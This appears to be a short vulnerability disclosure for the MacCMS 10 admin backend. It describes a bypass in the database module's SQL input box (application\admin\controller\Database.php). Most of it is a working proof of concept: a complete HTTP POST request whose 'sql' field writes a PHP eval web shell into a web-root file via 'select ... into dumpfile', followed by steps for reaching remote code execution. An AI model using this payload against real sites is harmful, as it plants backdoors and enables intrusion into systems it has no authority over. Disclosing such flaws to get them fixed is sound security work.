admin\controller\Database.php have a sql injection can upload files

[0kooo]

POC

POST /admin.php/admin/database/sql.html HTTP/1.1
Host: host
Content-Length: 162
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; xinhu_mo_adminid=yy0nm0mjj0mjn0vy0mmj0vk0mmn0mjm0iq0mjz0mjz0iv0vi0iu0nv07; xinhu_ca_adminuser=rock; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=3a2cdfed8edffe57; DedeLoginTime=1723190565; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=9f6e455551874f96; PHPSESSID=2c0harmim0vftioojbj8nqvibs
Connection: keep-alive

__token__=6ffe6f2213f3ab54515b904dff3d2923&sql=%2F**%2Fselect+'%3C%3Fphp+%40eval(%24_POST%5B1%5D)%3B'+into+dumpfile+'C%3A%2Fphpstudy_pro%2FWWW%2Fmaccms10%2F1.php'

version 2024.1000.4043

description The input box for executing SQL statements in the backend database module can allow for bypassing, leading to the execution of a web shell and thereby achieving file upload. The vulnerable directory is as follows：application\admin\controller\Database.php

process The following sentence should be entered into the input box: /**/select '<?php @eval($_POST[1]);' into dumpfile 'root directory/1.php'

result Accessing the filename of the file just uploaded to the website's root directory can achieve Remote Code Execution (RCE).

screenshot 1、upload 2、access